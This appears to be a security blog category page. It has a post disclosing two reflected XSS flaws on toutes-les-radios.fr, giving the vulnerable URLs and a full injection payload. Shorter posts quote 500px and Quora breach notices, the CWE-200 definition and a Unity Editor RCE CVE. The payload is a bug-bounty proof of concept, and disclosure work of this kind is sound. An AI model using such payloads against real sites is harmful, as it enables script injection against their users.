Category: Security

Security is the degree of resistance to, or protection from, harm. It applies to any vulnerable and valuable asset, such as a person, dwelling, community, nation, or organization.

Double XSS

Discovery of a double XSS

I discovered 2 XSS on the site toutes-les-radios.fr

Path: https://toutes-les-radios.fr/podcast/?radio=France%20Inter&name=PAYLOAD
Payload: %3C!%27/*!%22/*!\%27/*\%22/*–!%3E%3C/Title/%3C/script/%3E%3CInput%20Type= Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter=confirm`OPENBUGBOUNTY`%20//%3E

Path: https://toutes-les-radios.fr/?name=PAYLOAD&cover=chadafm.jpg&url= http://broadcast.infomaniak.net/chadafm-high.mp3&path=&streamid=&type=other&mtpt=
Payload: %3C!%27/*!%22/*!\%27/*\%22/*–!%3E%3C/Title/%3C/script/%3E%3CInput%20Type= Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter= confirm`OPENBUGBOUNTY`%20//%3E

Note: Wanting to submit them directly through OpenBugBounty, I received this message: A vulnerability on this domain has just been reported by another researcher. Please try again […]

500px was compromised

Our engineering team recently learned of a potential security issue affecting your 500px user account. We are taking this issue extremely seriously and have taken immediate action to address the situation and ensure the protection of our users’ data.

Quora was compromised


We are writing to let you know that we recently discovered that some user data was compromised as a result of unauthorized access to our systems by a malicious third party. We are very sorry for any concern or inconvenience this may cause. We are working rapidly to investigate the situation further and take the appropriate steps to prevent such incidents in the future.

CWE-200

CWE-200: An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.

CVE-2017-12939

A Remote Code Execution vulnerability was identified in all Windows versions of Unity Editor, e.g., before 5.3.8p2, 5.4.x before 5.4.5p5, 5.5.x before 5.5.4p3, 5.6.x before 5.6.3p1, and 2017.x before 2017.1.0p4. (CWE-20)